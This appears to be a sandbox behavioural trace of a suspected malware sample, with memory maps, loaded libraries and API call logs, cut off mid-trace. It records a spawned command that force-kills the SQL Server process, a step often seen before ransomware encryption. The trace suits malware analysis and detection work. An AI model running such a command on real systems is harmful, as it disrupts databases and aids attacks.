"private_0x0000000004200000" filename = "" Region: id = 5176 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5177 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5178 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5179 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5180 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5181 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5182 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5183 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 5184 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5185 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5186 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5187 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5188 start_va = 0x45a0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 5189 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5190 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5191 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5192 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5193 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5194 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5195 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5196 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5197 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 5198 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 5199 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5200 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5201 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5202 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5203 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5204 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5205 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5206 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5207 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5208 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5209 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5210 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5211 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5212 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5213 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5214 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5215 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5216 start_va = 0x4480000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 5217 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5218 start_va = 0x4570000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 5219 start_va = 0x47e0000 end_va = 0x4967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 5220 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5221 start_va = 0x4970000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004970000" filename = "" Region: id = 5222 start_va = 0x4b00000 end_va = 0x5efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 5223 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5224 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 5225 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5226 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 5227 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 5228 start_va = 0x5f00000 end_va = 0x6236fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5229 start_va = 0x45a0000 end_va = 0x4689fff monitored = 0 entry_point = 0x45dd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5230 start_va = 0x46e0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 5231 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 5232 start_va = 0x45a0000 end_va = 0x467ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5233 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5234 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 5235 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5236 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 5237 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5238 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5239 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5240 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5241 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 5242 start_va = 0x4520000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 5243 start_va = 0x4680000 end_va = 0x46bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 5244 start_va = 0x6240000 end_va = 0x627ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006240000" filename = "" Region: id = 5245 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 5246 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 5247 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5248 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5250 start_va = 0x4560000 end_va = 0x4565fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004560000" filename = "" Thread: id = 369 os_tid = 0x4c4 Thread: id = 370 os_tid = 0x448 Thread: id = 371 os_tid = 0x4c8 Thread: id = 372 os_tid = 0xb0 Thread: id = 373 os_tid = 0x12f4 Process: id = "73" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x79b7e000" os_pid = "0x4b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqlservr.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5253 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5254 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5255 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5256 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5257 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5258 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5259 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5260 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5261 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5262 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5263 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5264 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5265 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5266 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5267 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5268 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5269 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5270 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5271 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 5272 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5273 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5274 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5275 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5276 start_va = 0x480000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5277 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5278 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5280 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5281 start_va = 0x5f0000 end_va = 0x6adfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5282 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5283 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5284 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 5285 start_va = 0x7b0000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5287 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5288 start_va = 0x900000 end_va = 0xc36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 374 os_tid = 0x13dc [0219.281] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0219.281] __set_app_type (_Type=0x1) [0219.281] __p__fmode () returned 0x74974d6c [0219.281] __p__commode () returned 0x74975b1c [0219.281] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0219.282] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0219.282] GetCurrentThreadId () returned 0x13dc [0219.282] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x13dc) returned 0x78 [0219.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0219.282] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0219.282] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.289] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0219.289] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.289] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.289] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.290] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.290] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0219.290] GetConsoleOutputCP () returned 0x1b5 [0219.293] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0219.294] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0219.294] _get_osfhandle (_FileHandle=1) returned 0x144 [0219.294] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0219.294] _get_osfhandle (_FileHandle=1) returned 0x144 [0219.294] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0219.294] _get_osfhandle (_FileHandle=0) returned 0x140 [0219.294] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0219.294] GetEnvironmentStringsW () returned 0x4f7d60* [0219.294] GetProcessHeap () returned 0x4f0000 [0219.294] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa1a) returned 0x4f8788 [0219.294] FreeEnvironmentStringsA (penv="A") returned 1 [0219.294] GetProcessHeap () returned 0x4f0000 [0219.295] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4) returned 0x4f4440 [0219.295] GetEnvironmentStringsW () returned 0x4f7d60* [0219.295] GetProcessHeap () returned 0x4f0000 [0219.295] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa1a) returned 0x4f91b0 [0219.295] FreeEnvironmentStringsA (penv="A") returned 1 [0219.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0219.295] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, 